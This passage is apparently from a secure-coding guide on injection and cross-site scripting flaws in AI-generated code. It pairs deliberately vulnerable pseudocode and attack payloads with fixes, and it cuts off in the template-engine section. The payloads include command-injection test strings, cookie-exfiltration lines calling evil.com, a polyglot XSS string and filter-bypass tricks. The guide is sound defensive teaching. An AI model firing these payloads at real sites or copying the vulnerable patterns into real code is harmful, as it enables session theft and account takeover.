Shell execution with concatenation +regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/ + +// 5. Shell=True with variables +regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/ +``` + +### Manual Testing Approaches + +```pseudocode +// SQL Injection Test Payloads: + +basicTests = [ + "' OR '1'='1", // Basic auth bypass + "'; DROP TABLE test; --", // Stacked queries + "' UNION SELECT null--", // Union-based + "1 AND 1=1", // Boolean-based + "1' AND SLEEP(5)--", // Time-based blind +] + +// Command Injection Test Payloads: + +commandTests = [ + "; whoami", // Command chaining + "| id", // Pipe injection + "$(whoami)", // Command substitution + "`id`", // Backtick substitution + "& ping -c 4 attacker.com", // Background execution +] + +// Testing Methodology: +1. Identify all input points (forms, URLs, headers, JSON fields) +2. Trace input flow to database queries or shell commands +3. Inject test payloads at each point +4. Monitor for: + - SQL errors in response + - Time delays (for blind injection) + - DNS/HTTP callbacks (for out-of-band) + - Changed behavior indicating injection success +``` + +### Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Query Construction** | Any string concatenation or interpolation with query strings | +| **Dynamic Identifiers** | Table names, column names, ORDER BY from user input | +| **Raw Queries in ORM** | `.raw()`, `.execute()`, or similar with string building | +| **Shell Execution** | Any use of `system()`, `exec()`, `shell=True` | +| **Command Building** | String concatenation before command execution | +| **Input Sources** | Follow data from request to query/command | + +--- + +## Security Checklist + +- [ ] All SQL queries use parameterized statements or prepared queries +- [ ] ORM raw queries also use parameterization +- [ ] Dynamic table/column names validated against strict allowlist +- [ ] ORDER BY and LIMIT clauses use validated/allowlisted 
values +- [ ] No shell=True in subprocess calls +- [ ] All command-line arguments passed as arrays, not strings +- [ ] User-controlled file paths validated and sanitized +- [ ] Environment variables not set from user input +- [ ] Second-order injection considered (data from DB still parameterized) +- [ ] Stored procedures reviewed for internal dynamic SQL +- [ ] Input validation applied after all normalization/decoding +- [ ] Code review specifically checks all query/command construction + +--- + +# Pattern 3: Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization of Script in Attributes), CWE-87 (Improper Neutralization of Alternate XSS Syntax) + +**Priority Score:** 23 (Frequency: 10, Severity: 8, Detectability: 5) + +--- + +## Introduction: Why AI Often Misses Context-Specific Encoding + +Cross-Site Scripting (XSS) is one of the most prevalent vulnerabilities in AI-generated code. Research shows that **86% of AI-generated code fails XSS defenses** (Veracode 2025), and AI-generated code is **2.74x more likely to contain XSS** than human-written code (CodeRabbit analysis). + +**Why AI Models Generate XSS Vulnerabilities:** + +1. **Context-Blindness:** XSS prevention requires understanding the *context* where user input will be rendered: HTML body, attributes, JavaScript, CSS, or URLs. Each context requires different encoding. AI models frequently apply generic or no encoding because they lack awareness of rendering context. + +2. **Training Data Shows innerHTML Everywhere:** Tutorials and Stack Overflow answers heavily use `innerHTML`, `document.write()`, and template string injection for DOM manipulation. AI learns these as standard patterns. + +3. 
**Framework Misunderstanding:** Modern frameworks like React provide automatic escaping, but AI often bypasses these safeguards using `dangerouslySetInnerHTML`, `v-html`, or raw template interpolation when the task seems to require "rich" HTML output. + +4. **Encoding vs. Validation Confusion:** AI models often implement input validation (checking what characters are allowed) but skip output encoding (safely rendering data in context). Validation is for data integrity; encoding is for XSS prevention. + +5. **Client-Side Trust:** AI frequently treats client-side code as "safe" since it runs in the browser. It fails to recognize that XSS attacks *exploit* the browser's trust in the application. + +**Impact of XSS:** + +- **Session Hijacking:** Attacker steals session cookies and impersonates victims +- **Account Takeover:** Keylogging, credential theft, or forced password changes +- **Data Exfiltration:** Stealing sensitive data displayed to the user +- **Malware Distribution:** Redirecting users to malicious sites +- **Defacement:** Altering page content for phishing or reputation damage +- **Worm Propagation:** Self-spreading XSS (Samy worm affected 1M MySpace users) + +**XSS Variants:** + +| Type | Storage | Execution | Example Vector | +|------|---------|-----------|----------------| +| **Reflected** | URL/Request | Immediate | Search query in results page | +| **Stored** | Database | Later visitors | Comment with script in blog | +| **DOM-based** | Client-side | JavaScript processes | URL fragment processed by JS | +| **Mutation (mXSS)** | Sanitizer bypass | DOM mutation | Markup that changes during parsing | + +--- + +## Multiple BAD Examples Across Contexts + +### BAD Example 1: HTML Body Injection + +```pseudocode +// VULNERABLE: Direct injection into HTML body +function displayUserComment(comment): + // User input directly placed in HTML + document.getElementById("comments").innerHTML = + "
" + comment + "
" + +// Attack: comment = "" +// Result: Script executes, cookies sent to attacker + +// VULNERABLE: Server-side template without encoding +function renderProfilePage(username, bio): + return """ + + +

Profile: {username}

+

{bio}

+ + + """.format(username=username, bio=bio) + +// Attack: bio = "" +// Result: onerror handler executes JavaScript + +// VULNERABLE: Using document.write +function showWelcome(name): + document.write("

Welcome, " + name + "!

") + +// Attack: name = "" +``` + +**Why This Is Dangerous:** +- Script tags execute immediately upon DOM insertion +- Event handlers (`onerror`, `onload`, `onclick`) execute without script tags +- SVG elements can contain executable code +- `document.write` and `innerHTML` interpret HTML in user input + +--- + +### BAD Example 2: HTML Attribute Injection + +```pseudocode +// VULNERABLE: User input in HTML attributes +function renderImage(imageUrl, altText): + return '' + altText + '' + +// Attack: altText = '" onmouseover="alert(document.cookie)" x="' +// Result: + +// VULNERABLE: Unquoted attributes +function renderLink(url, text): + return "" + text + "" + +// Attack: url = "http://site.com onclick=alert(1)" +// Result: text + +// VULNERABLE: Input in style attribute +function setBackgroundColor(color): + element.setAttribute("style", "background-color: " + color) + +// Attack: color = "red; background-image: url('javascript:alert(1)')" +// Attack: color = "expression(alert('XSS'))" // IE-specific + +// VULNERABLE: Event handler attribute +function renderButton(buttonId, label): + return '' + +// Attack: label = "'); alert(document.cookie); ('" +// Result: onclick="handleClick(''); alert(document.cookie); ('")" +``` + +**Why This Is Dangerous:** +- Unquoted attributes break at whitespace, allowing new attributes +- Quoted attributes can break out with matching quotes +- Event handler attributes execute JavaScript directly +- Certain attributes (`href`, `src`, `style`) have special parsing rules + +--- + +### BAD Example 3: JavaScript Context Injection + +```pseudocode +// VULNERABLE: User input embedded in JavaScript +function generateUserScript(username): + return """ + + """.format(username=username) + +// Attack: username = "'; alert(document.cookie); //'" +// Result: var currentUser = ''; alert(document.cookie); //'; + +// VULNERABLE: JSON data embedded in script +function embedUserData(userData): + return """ + + """.format(userData=jsonEncode(userData)) + 
+// Attack: userData contains +// JSON encoding doesn't prevent HTML context escape + +// VULNERABLE: Template literals with user input +function renderTemplate(message): + return `` + +// Attack: message = '${alert(document.cookie)}' // Template literal injection +// Attack: message = '");alert(document.cookie);//' // String escape + +// VULNERABLE: Dynamic script construction +function addEventHandler(eventName, userCallback): + element.setAttribute("onclick", "handleEvent('" + userCallback + "')") + +// Attack: userCallback = "'); stealData(); ('" +``` + +**Why This Is Dangerous:** +- JavaScript string context requires JavaScript-specific escaping +- HTML closing tags (``) can break out of script blocks +- Template literals have their own injection risks +- Inline event handlers compound HTML and JavaScript contexts + +--- + +### BAD Example 4: URL Context Injection + +```pseudocode +// VULNERABLE: User input in href attribute +function renderNavLink(destination): + return 'Click here' + +// Attack: destination = "javascript:alert(document.cookie)" +// Result: Click here + +// VULNERABLE: URL parameters without encoding +function buildSearchUrl(query): + return 'Search again' + +// Attack: query = '" onclick="alert(1)" x="' +// Result: Search again + +// VULNERABLE: Redirect based on user input +function handleRedirect(url): + window.location = url + +// Attack: url = "javascript:alert(document.cookie)" +// Result: JavaScript execution via location change + +// VULNERABLE: Open redirect leading to XSS +function redirectAfterLogin(returnUrl): + return '' + +// Attack: returnUrl = "data:text/html," +// Attack: returnUrl = "javascript:alert(1)" +``` + +**Why This Is Dangerous:** +- `javascript:` URLs execute code when navigated +- `data:` URLs can contain executable HTML/JavaScript +- `vbscript:` URLs execute on older IE +- URL encoding alone doesn't prevent protocol-based attacks + +--- + +### BAD Example 5: CSS Context Injection + +```pseudocode +// VULNERABLE: 
User input in CSS +function applyCustomStyle(customCss): + styleElement = document.createElement("style") + styleElement.textContent = ".user-style { " + customCss + " }" + document.head.appendChild(styleElement) + +// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {" +// Result: CSS exfiltration of page data + +// VULNERABLE: CSS expression (legacy IE) +function setWidth(width): + element.style.cssText = "width: " + width + +// Attack: width = "expression(alert(document.cookie))" +// Result: JavaScript execution via CSS expression (IE) + +// VULNERABLE: CSS injection via style attribute +function renderAvatar(avatarUrl): + return '
' + +// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x" +// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '" + +// VULNERABLE: CSS @import injection +function loadTheme(themeUrl): + return "" + +// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?" +``` + +**Why This Is Dangerous:** +- CSS can exfiltrate data via `url()` requests +- Legacy IE `expression()` executes JavaScript +- CSS injection can alter page appearance for phishing +- `@import` can load attacker-controlled stylesheets + +--- + +## GOOD Examples for Each Context + +### GOOD Example 1: Proper HTML Encoding + +```pseudocode +// SECURE: HTML entity encoding for body content +function htmlEncode(str): + return str + .replace("&", "&amp;") // Must be first + .replace("<", "&lt;") + .replace(">", "&gt;") + .replace('"', "&quot;") + .replace("'", "&#x27;") + .replace("/", "&#x2F;") // Prevents </script> escapes + +function displayUserComment(comment): + safeComment = htmlEncode(comment) + document.getElementById("comments").innerHTML = + "<div class='comment'>" + safeComment + "</div>" + +// SECURE: Using textContent instead of innerHTML +function displayUserCommentSafe(comment): + div = document.createElement("div") + div.className = "comment" + div.textContent = comment // Automatically safe - no HTML interpretation + document.getElementById("comments").appendChild(div) + +// SECURE: Server-side template with auto-escaping +function renderProfilePage(username, bio): + // Use templating engine with auto-escaping enabled + return template.render("profile.html", { + username: username, // Engine auto-escapes + bio: bio + }) + +// SECURE: Framework createElement pattern +function createUserCard(name, email): + card = document.createElement("article") + + nameEl = document.createElement("h3") + nameEl.textContent = name // Safe + + emailEl = document.createElement("p") + emailEl.textContent = email // Safe + + card.appendChild(nameEl) + card.appendChild(emailEl) + return card +``` + +**Why This Is Secure:** +- HTML entities are displayed as text, not interpreted as markup +- `textContent` never interprets HTML +- createElement + textContent is inherently safe +- Auto-escaping templates handle encoding automatically + +--- + +### GOOD Example 2: Proper Attribute Encoding + +```pseudocode +// SECURE: Attribute encoding (superset of HTML encoding) +function attributeEncode(str): + return str + .replace("&", "&amp;") + .replace("<", "&lt;") + .replace(">", "&gt;") + .replace('"', "&quot;") + .replace("'", "&#x27;") + .replace("`", "&#x60;") + .replace("=", "&#x3D;") + +// SECURE: Always quote attributes and encode values +function renderImage(imageUrl, altText): + safeUrl = attributeEncode(imageUrl) + safeAlt = attributeEncode(altText) + return '' + safeAlt + '' + +// SECURE: Using setAttribute (browser handles encoding) +function renderImageSafe(imageUrl, altText): + img = document.createElement("img") + img.setAttribute("src", imageUrl) // Safe + img.setAttribute("alt", altText) // Safe + return img + +// SECURE: Data attributes with proper encoding +function 
renderDataElement(userId, userName): + div = document.createElement("div") + div.dataset.userId = userId // Automatically safe + div.dataset.userName = userName // Automatically safe + return div + +// SECURE: Style attribute with validation +ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"} + +function setBackgroundColor(color): + if color in ALLOWED_COLORS: + element.style.backgroundColor = color + else: + element.style.backgroundColor = "white" // Safe default +``` + +**Why This Is Secure:** +- Quotes prevent attribute breakout +- Encoding prevents quote escapes +- setAttribute handles encoding automatically +- dataset properties are automatically safe +- Allowlists prevent injection of arbitrary values + +--- + +### GOOD Example 3: JavaScript Encoding + +```pseudocode +// SECURE: JavaScript string encoding +function jsStringEncode(str): + return str + .replace("\\", "\\\\") // Backslash first + .replace("'", "\\'") + .replace('"', '\\"') + .replace("\n", "\\n") + .replace("\r", "\\r") + .replace(" breakout + safeJson = htmlEncode(jsonData) + + return """ + + """.format(safeJson=safeJson) + +// BETTER: Use data attributes instead of inline scripts +function embedUserDataSafe(element, userData): + // Store data in attribute, process in external script + element.dataset.user = jsonEncode(userData) + // External script reads: JSON.parse(element.dataset.user) + +// SECURE: Separate data from code with JSON endpoint +function loadUserData(): + // Instead of embedding in HTML, fetch from API + fetch('/api/user/data') + .then(response => response.json()) + .then(data => processData(data)) + +// SECURE: Using structured data in script type +function embedStructuredData(pageData): + return """ + + + """.format(jsonData=jsonEncode(pageData)) +``` + +**Why This Is Secure:** +- JavaScript escaping prevents string breakout +- HTML encoding in script blocks prevents `` escape +- Data attributes separate data from code +- JSON endpoints avoid embedding 
untrusted data in HTML +- `type="application/json"` blocks aren't executed as JavaScript + +--- + +### GOOD Example 4: URL Encoding + +```pseudocode +// SECURE: URL encoding for query parameters +function urlEncode(str): + return encodeURIComponent(str) + +function buildSearchUrl(query): + safeQuery = urlEncode(query) + return '/search?q=' + safeQuery + +// SECURE: Validating URL schemes (allowlist) +SAFE_SCHEMES = {"http", "https", "mailto"} + +function validateUrl(url): + try: + parsed = parseUrl(url) + if parsed.scheme.lower() in SAFE_SCHEMES: + return url + catch: + pass + return "/fallback" // Safe default + +function renderLink(destination, text): + safeUrl = validateUrl(destination) + safeText = htmlEncode(text) + return '' + safeText + '' + +// SECURE: URL validation with additional checks +function validateExternalUrl(url): + parsed = parseUrl(url) + + // Check scheme + if parsed.scheme.lower() not in {"http", "https"}: + return null + + // Check for credential injection + if parsed.username or parsed.password: + return null + + // Check for IP address (optional restriction) + if isIpAddress(parsed.host): + return null + + return url + +// SECURE: Relative URLs only (prevent open redirect) +function validateRedirectUrl(url): + // Only allow relative paths + if url.startsWith("/") and not url.startsWith("//"): + // Prevent path traversal + normalized = normalizePath(url) + if not ".." in normalized: + return normalized + return "/" // Safe default +``` + +**Why This Is Secure:** +- `encodeURIComponent` handles special characters +- Scheme allowlist prevents `javascript:` and `data:` URLs +- Relative-only validation prevents open redirects +- Multiple validation layers provide defense in depth + +--- + +### GOOD Example 5: Using Safe APIs (textContent vs innerHTML) + +```pseudocode +// SECURE: Safe DOM manipulation patterns + +// Instead of innerHTML with user data: +// DANGEROUS: element.innerHTML = "

" + userInput + "

" + +// SECURE: Use textContent for text nodes +function setElementText(element, text): + element.textContent = text // Never interprets HTML + +// SECURE: Build DOM programmatically +function createListItem(text, isHighlighted): + li = document.createElement("li") + li.textContent = text // Safe text assignment + + if isHighlighted: + li.classList.add("highlighted") // Safe class manipulation + + return li + +// SECURE: Use template elements for complex HTML +function createCardFromTemplate(name, description): + template = document.getElementById("card-template") + card = template.content.cloneNode(true) + + // Set text content safely + card.querySelector(".card-name").textContent = name + card.querySelector(".card-desc").textContent = description + + return card + +// SECURE: Use DocumentFragment for batch operations +function renderList(items): + fragment = document.createDocumentFragment() + + for item in items: + li = document.createElement("li") + li.textContent = item.name // Safe + fragment.appendChild(li) + + document.getElementById("list").appendChild(fragment) + +// SECURE: Sanitize when HTML is genuinely needed +function renderRichContent(htmlContent): + // Use DOMPurify or similar trusted sanitizer + sanitized = DOMPurify.sanitize(htmlContent, { + ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"], + ALLOWED_ATTR: ["href"], + ALLOW_DATA_ATTR: false + }) + element.innerHTML = sanitized +``` + +**Why This Is Secure:** +- `textContent` never interprets HTML or scripts +- `createElement` + `textContent` is inherently safe +- Templates allow complex HTML without injection risk +- DOMPurify provides sanitization when HTML is required + +--- + +## Edge Cases Section + +### Edge Case 1: Mutation XSS (mXSS) + +```pseudocode +// DANGEROUS: Browser mutations can bypass sanitization + +// How mXSS works: +// 1. Sanitizer processes malformed HTML +// 2. Browser "fixes" the HTML during parsing +// 3. 
Fixed HTML contains executable content + +// Example: Backtick mutation +inputHtml = "" +// Some sanitizers don't escape backticks +// Browser may convert backticks to quotes in certain contexts + +// Example: Namespace confusion +inputHtml = "" +// SVG/MathML namespaces have different parsing rules +// Sanitizer might miss the nested script + +// Example: Table element mutations +inputHtml = "
" +// Browser moves
outside during parsing +// Can result in unexpected DOM structure + +// SECURE: Use battle-tested sanitizer with mXSS protection +function sanitizeHtml(html): + return DOMPurify.sanitize(html, { + // DOMPurify has mXSS protection built-in + USE_PROFILES: {html: true}, + // Optionally restrict further + FORBID_TAGS: ["style", "math", "svg"], + FORBID_ATTR: ["style"] + }) + +// BETTER: Avoid HTML sanitization when possible +function renderUserContent(content): + // If you only need formatted text, use markdown + markdownHtml = markdownToHtml(content) // Controlled conversion + return DOMPurify.sanitize(markdownHtml) +``` + +**Detection:** Test with: +- Malformed nesting (`
`) +- Namespace elements (``, ``, ``) +- Backticks and other unusual quote characters +- Processing instruction-like content (``) + +--- + +### Edge Case 2: Polyglot Payloads + +```pseudocode +// DANGEROUS: Payloads that work in multiple contexts + +// Polyglot XSS example: +payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//\\x3csVg/" + +// This payload attempts to work in: +// - JavaScript context (javascript: URL) +// - HTML attribute context (onclick) +// - Inside HTML comments +// - Inside style/title/textarea/script tags +// - SVG context + +// Why this matters: +// - Single payload tests multiple vectors +// - Fuzzy input handling might trigger in unexpected context +// - Copy-paste from "safe" context to unsafe context + +// SECURE: Context-specific encoding, not generic filtering +function outputToContext(value, context): + switch context: + case "html_body": + return htmlEncode(value) + case "html_attribute": + return attributeEncode(value) + case "javascript_string": + return jsStringEncode(value) + case "url_parameter": + return urlEncode(value) + case "css_value": + return cssEncode(value) + default: + throw Error("Unknown context: " + context) + +// Each encoder handles that specific context's dangerous characters +``` + +**Detection:** Use polyglot payloads in security testing to find context confusion vulnerabilities. 
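
The context dispatcher above maps fairly directly onto the Python standard library. The sketch below is one possible shape, under two stated assumptions. First, the JavaScript branch uses `json.dumps`, which returns a complete quoted string literal, unlike the pseudocode's `jsStringEncode`. Second, a CSS encoder is left out, so `css_value` is rejected as unsupported. The function name `encode_for_context` is illustrative.

```python
import html
import json
from urllib.parse import quote


def encode_for_context(value: str, context: str) -> str:
    """Encode untrusted text for one specific output context."""
    if context == "html_body":
        # Escapes &, < and > so the value renders as text.
        return html.escape(value, quote=False)
    if context == "html_attribute":
        # Also escapes " and '; the attribute must still be quoted in the template.
        return html.escape(value, quote=True)
    if context == "javascript_string":
        # json.dumps produces a quoted literal with \, " and control chars escaped.
        # <, > and & are additionally escaped so the literal cannot close a script
        # element or be re-read as markup.
        literal = json.dumps(value)
        return (
            literal.replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026")
        )
    if context == "url_parameter":
        # Percent-encode everything outside the unreserved set, including "/".
        return quote(value, safe="")
    raise ValueError("Unknown or unsupported context: " + context)


if __name__ == "__main__":
    sample = "</script><img src=x onerror=alert(1)>"
    for ctx in ("html_body", "html_attribute", "javascript_string", "url_parameter"):
        print(ctx, "->", encode_for_context(sample, ctx))
```

Raising on an unknown context instead of falling back to a default keeps a missing encoder from silently becoming "no encoding".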
+ +--- + +### Edge Case 3: Encoding Bypass Techniques + +```pseudocode +// DANGEROUS: Incomplete encoding can be bypassed + +// Bypass 1: Case variation +// Filter checks: if "alert(1)" +// Browser: case-insensitive HTML parsing + +// Bypass 2: HTML entities in event handlers +// Filter: remove "javascript:" +// Input: "javascript:alert(1)" +// Browser decodes entities before processing + +// Bypass 3: Null bytes +// Input: "java\x00script:alert(1)" +// Some filters/WAFs don't handle null bytes +// Some browsers ignore them + +// Bypass 4: Overlong UTF-8 +// Normal '<': 0x3C +// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept) + +// Bypass 5: Mixed encoding +// Input: "%3Cscript%3Ealert(1)%3C/script%3E" +// If HTML-encoded before URL-decoded, double encoding attack + +// SECURE: Encode on output, not filter on input +function secureOutput(userInput, context): + // Don't try to filter/blocklist dangerous patterns + // DO encode appropriately for the output context + + // The encoding makes ALL user input safe + // regardless of what it contains + return encode(userInput, context) + +// SECURE: Canonicalize THEN validate +function processInput(input): + // 1. Decode all encoding layers + decoded = fullyDecode(input) // URL, HTML entities, etc. + + // 2. Normalize (lowercase, normalize unicode) + normalized = normalize(decoded) + + // 3. Validate against rules + if not isValid(normalized): + reject() + + // 4. Store normalized form + store(normalized) + + // 5. Encode on output (later) +``` + +**Key Insight:** Output encoding is more reliable than input filtering because you know the exact output context. 
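
The canonicalize-then-validate steps can be sketched in Python as follows. This is a minimal illustration, assuming URL percent-encoding is the only transport encoding in play and that NFKC is the normalization form the application uses. The username rule, the round limit, and the helper names are hypothetical. Output encoding is still required when the value is rendered.

```python
import re
import unicodedata
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumed limit; deeper nesting is treated as hostile
USERNAME_RE = re.compile(r"[a-z0-9_.-]{1,32}")  # hypothetical allowlist rule


def canonicalize(raw: str) -> str:
    """Decode percent-encoding until stable, then normalize Unicode and case."""
    current = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break  # nothing left to decode
        current = decoded
    else:
        # Still changing after MAX_DECODE_ROUNDS passes.
        raise ValueError("too many encoding layers")
    return unicodedata.normalize("NFKC", current).lower()


def is_valid_username(raw: str) -> bool:
    """Validate the canonical form, never the raw input."""
    try:
        return USERNAME_RE.fullmatch(canonicalize(raw)) is not None
    except ValueError:
        return False


if __name__ == "__main__":
    # Double-encoded quote, fullwidth apostrophe (U+FF07), and a benign name.
    for candidate in ("%2527", "\uff07", "Alice_01"):
        print(repr(candidate), repr(canonicalize(candidate)), is_valid_username(candidate))
```

Because validation runs on the fully decoded and normalized string, a double-encoded or fullwidth quote is seen as a plain `'` and rejected by the allowlist.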
+ +--- + +### Edge Case 4: DOM Clobbering + +```pseudocode +// DANGEROUS: HTML elements can override JavaScript globals + +// How DOM clobbering works: +// Elements with id or name attributes create global variables +html = '' +// Now: window.alert === element +// alert(1) throws error instead of showing alert + +// Exploitable clobbering: +html = '' +// document.cookie might now reference the input element + +// Attack on sanitizer output: +html = '' +// If code does: location = document.getElementById(cid) +// Attacker controls the navigation + +// More dangerous patterns: +html = '
' +// x.y now references the input +// Chains allow deep property access + +// SECURE: Avoid global lookups for security-sensitive operations +function getConfigValue(key): + // DON'T: return window[key] + // DON'T: return document.getElementById(key).value + + // DO: Use a namespaced config object + return APP_CONFIG[key] + +// SECURE: Use unique prefixes for security-critical IDs +function getElementById(id): + // Prefix with app-specific namespace + return document.getElementById("app__" + id) + +// SECURE: Validate types after DOM queries +function getFormElement(id): + element = document.getElementById(id) + if element instanceof HTMLFormElement: + return element + throw Error("Expected form element") +``` + +**Detection:** Test with: +- Elements with IDs matching JavaScript globals (`alert`, `name`, `location`) +- Elements with names matching object properties (`cookie`, `domain`) +- Nested forms with chained name/id attributes + +--- + +## Common Mistakes Section + +### Mistake 1: Encoding Once, Using in Multiple Contexts + +```pseudocode +// DANGEROUS: Single encoding for multiple contexts + +function saveUserProfile(name, bio): + // Encoding once at input time + safeName = htmlEncode(name) + safeBio = htmlEncode(bio) + + database.save({name: safeName, bio: safeBio}) + +function displayProfile(user): + // HTML context - HTML encoding was correct + htmlOutput = "

" + user.name + "

" // OK + + // But JavaScript context needs different encoding! + jsOutput = "" + // If name contained single quotes: "O'Brien" -> already encoded as "O&#x27;Brien" + // Now in JS context, &#x27; is literal text, not a quote escape + + // And URL context is wrong too! + urlOutput = "/profile?name=" + user.name + // HTML entities in URL don't encode properly + +// SECURE: Store raw data, encode on output +function saveUserProfile(name, bio): + // Store raw (unencoded) user input + database.save({name: name, bio: bio}) + +function displayProfile(user): + // Encode specifically for each output context + htmlName = htmlEncode(user.name) + jsName = jsStringEncode(user.name) + urlName = urlEncode(user.name) + + htmlOutput = "

" + htmlName + "

" + jsOutput = "" + urlOutput = "/profile?name=" + urlName +``` + +**Rule:** Store data raw. Encode at the point of output, specific to that context. + +--- + +### Mistake 2: Client-Side Only Sanitization + +```pseudocode +// DANGEROUS: Relying only on client-side protection + +// Client-side sanitization +function submitComment(comment): + // Sanitize before sending to server + cleanComment = DOMPurify.sanitize(comment) + fetch("/api/comments", { + method: "POST", + body: JSON.stringify({comment: cleanComment}) + }) + +// Problem: Attacker bypasses client-side code entirely +// Using curl, Postman, or modified browser +curlCommand = """ +curl -X POST https://site.com/api/comments \\ + -H "Content-Type: application/json" \\ + -d '{"comment": ""}' +""" + +// Server trusts the input because "client sanitized it" +function handleCommentApi(request): + comment = request.body.comment + database.saveComment(comment) // Stored XSS! + +// SECURE: Server-side sanitization is mandatory +function handleCommentApiSecure(request): + comment = request.body.comment + + // Server-side sanitization + cleanComment = serverSideSanitize(comment) + + database.saveComment(cleanComment) + +function displayComment(comment): + // Still encode on output (defense in depth) + return htmlEncode(comment) + +// NOTE: Client-side sanitization can still be useful for: +// - Preview functionality +// - Reducing server load +// - Better UX feedback +// But it must NEVER be the only protection +``` + +**Rule:** Server-side encoding/sanitization is mandatory. Client-side is optional enhancement. + +--- + +### Mistake 3: Blocklist Approaches + +```pseudocode +// DANGEROUS: Trying to block known-bad patterns + +function filterXss(input): + // Block list approach + dangerous = [ + "", + "javascript:", + "onerror", "onload", "onclick", + "alert", "eval", "document.cookie" + ] + + result = input + for pattern in dangerous: + result = result.replace(pattern, "") + + return result + +// Bypasses: +// 1. 
Case: "" +// 2. Encoding: "<script>alert(1)</script>" +// 3. Null bytes: "alert(1)" +// 4. Other events: "onmouseover", "onfocus", "onanimationend" +// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)" +// 6. New features: Future HTML/JS features not in blocklist + +// DANGEROUS: Regex blocklist +function filterXssRegex(input): + // Still bypassable + if regex.match(/.*?<\/script>/i, input): + return "" + return input + +// Bypass: "ipt>alert(1)ipt>" +// After removal: "" + +// SECURE: Allowlist approach +function sanitizeUsername(input): + // Only allow expected characters + if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input): + return input + throw ValidationError("Invalid username") + +// SECURE: Proper encoding (makes blocklist unnecessary) +function displaySafely(input): + return htmlEncode(input) // All input is safe after encoding +``` + +**Rule:** Allowlist what's expected, or encode everything. Never blocklist dangerous patterns. + +--- + +### Mistake 4: Trusting Sanitization Libraries Blindly + +```pseudocode +// DANGEROUS: Assuming sanitization handles everything + +function processHtml(userHtml): + // "The library handles XSS" + clean = sanitizer.sanitize(userHtml) + + // But then using it unsafely: + // 1. Wrong context + return "" + // Sanitizer cleaned HTML context, not JavaScript context + + // 2. Double encoding + clean = sanitizer.sanitize(htmlEncode(userHtml)) + // Now clean contains encoded entities that might decode later + + // 3. Post-processing that reintroduces vulnerabilities + processed = clean.replace("[link]", "
link") + // Custom processing after sanitization can break safety + +// SECURE: Understand what the sanitizer does +function processHtmlSecure(userHtml): + // 1. Sanitize for HTML context + cleanHtml = DOMPurify.sanitize(userHtml, { + ALLOWED_TAGS: ["p", "b", "i", "a"], + ALLOWED_ATTR: ["href"] + }) + + // 2. Validate URLs in allowed href attributes + dom = parseHtml(cleanHtml) + for link in dom.querySelectorAll("a[href]"): + if not isValidUrl(link.href): + link.removeAttribute("href") + + // 3. Return the validated DOM (not the pre-validation string); use only in HTML context + return serializeHtml(dom) + +// SECURE: For JavaScript context, don't use HTML sanitizer +function embedDataInJs(data): + // JSON encoding is the appropriate "sanitizer" for JSON/JS + // When the result is placed in an inline script block, also escape "<": + // JSON.stringify alone does not stop a closing script tag in the data from ending the block + return JSON.stringify(data).replaceAll("<", "\\u003c") +``` + +**Rule:** Use the right encoding/sanitization for each context. Sanitizers are context-specific. + +--- + +## Framework-Specific Guidance (Pseudocode Patterns) + +### React Pattern + +```pseudocode +// React default: Auto-escaping in JSX +function UserProfile(props): + // SAFE: React escapes by default + return ( +
+

{props.username}

// Auto-escaped +

{props.bio}

// Auto-escaped +
+ ) + +// DANGEROUS: dangerouslySetInnerHTML bypasses protection +function RichContent(props): + // VULNERABLE if props.html is user-controlled + return
+ +// SECURE: Sanitize before using dangerouslySetInnerHTML +function RichContentSafe(props): + sanitizedHtml = DOMPurify.sanitize(props.html) + return
+ +// DANGEROUS: href with user input +function UserLink(props): + // VULNERABLE: javascript: URLs execute + return {props.text} + +// SECURE: Validate URL scheme +function UserLinkSafe(props): + url = props.url + if not url.startsWith("http://") and not url.startsWith("https://"): + url = "#" // Safe fallback + return {props.text} +``` + +--- + +### Vue Pattern + +```pseudocode +// Vue default: Auto-escaping with {{ }} + + +// DANGEROUS: v-html bypasses protection + + +// SECURE: Sanitize before v-html + + + +// DANGEROUS: Dynamic attribute binding + + +// SECURE: URL validation + +``` + +--- + +### Angular Pattern + +```pseudocode +// Angular default: Auto-sanitization +@Component({ + template: ` + +

{{ username }}

+

{{ bio }}

+ ` +}) + +// Angular [innerHTML] is semi-safe (Angular sanitizes) +@Component({ + template: ` + +
+ ` +}) + +// DANGEROUS: Bypassing sanitization +import { DomSanitizer } from '@angular/platform-browser' + +@Component({...}) +class MyComponent { + constructor(private sanitizer: DomSanitizer) {} + + // VULNERABLE: Bypasses Angular's sanitization + get unsafeHtml() { + return this.sanitizer.bypassSecurityTrustHtml(this.userInput) + } +} + +// SECURE: Let Angular sanitize, or use additional sanitizer +@Component({...}) +class MyComponentSafe { + get safeHtml() { + // Angular's default sanitization is usually sufficient + // For extra safety, pre-sanitize + return DOMPurify.sanitize(this.userInput) + } +} +``` + +--- + +### Server-Side Template Engines Pattern + +```pseudocode +// Jinja2 (Python) +// SAFE: Auto-escaping by default +

{{ username }}

+ +// DANGEROUS: |safe filter +
{{ user_html | safe }}
+ +// Handlebars +// SAFE: {{ }} escapes +

{{username}}

+ +// DANGEROUS: {{{ }}} triple braces +
{{{user_html}}}
+ +// EJS (Node.js) +// SAFE: <%= %> escapes +

<%= username %>

+ +// DANGEROUS: <%- %> raw +
<%- user_html %>
+ +// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed +// Jinja2 +
